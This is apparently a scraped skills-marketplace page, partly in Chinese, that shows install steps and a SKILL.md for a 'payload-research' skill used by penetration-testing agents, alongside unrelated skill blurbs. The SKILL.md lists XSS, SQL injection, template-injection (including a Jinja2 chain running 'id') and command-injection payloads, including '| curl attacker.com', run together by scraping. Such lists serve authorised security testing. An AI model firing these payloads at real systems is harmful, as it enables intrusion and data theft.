用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/m-sec-org/BreachWeave --skill payload-research命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
This skill should be used when working with Bun runtime, bun:sqlite, Bun.serve, bun:test, or when "Bun", "bun:test", or Bun-specific patterns are mentioned.
pi-mono agent framework reference (github.com/badlogic/pi-mono). TRIGGER when: writing agent code using pi-ai/pi-agent-core/pi-coding-agent packages, defining tools with TypeBox schemas, implementing TUI or Web UI over an agent core, building extensions that hook into agent lifecycle, working with session/compaction/retry logic, implementing LLM provider abstractions, or any code that imports from @mariozechner/* packages.
UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient.
基于 SOC 职业分类
正在显示 SKILL.md
| name | payload-research |
| description | Payload crafting and bypass research for vulnerability verification |
| tags | ["pentest","payload","research"] |
Use this skill when you need to research, craft, or refine payloads for vulnerability verification.
<script>alert(1)</script><img onerror=alert(1) src=x><svg onload=alert(1)>{{constructor.constructor('alert(1)')()}}' OR '1'='1, 1; SELECT 1--' UNION SELECT null,null--'; WAITFOR DELAY '0:0:5'--{{7*7}}, ${7*7}, <%= 7*7 %>{{config.__class__.__init__.__globals__['os'].popen('id').read()}}; id, | id, `id`; sleep 5, | curl attacker.comsubmit_sub_agent_output exactly once.candidate_findings.status as candidate (no final vulnerability verdicts here).hypothesis_id is provided, all submitted hypotheses/findings must remain on that single hypothesis.goal_achieved=true, default action is stop and hand off to document/report unless deep-dive is explicitly requested.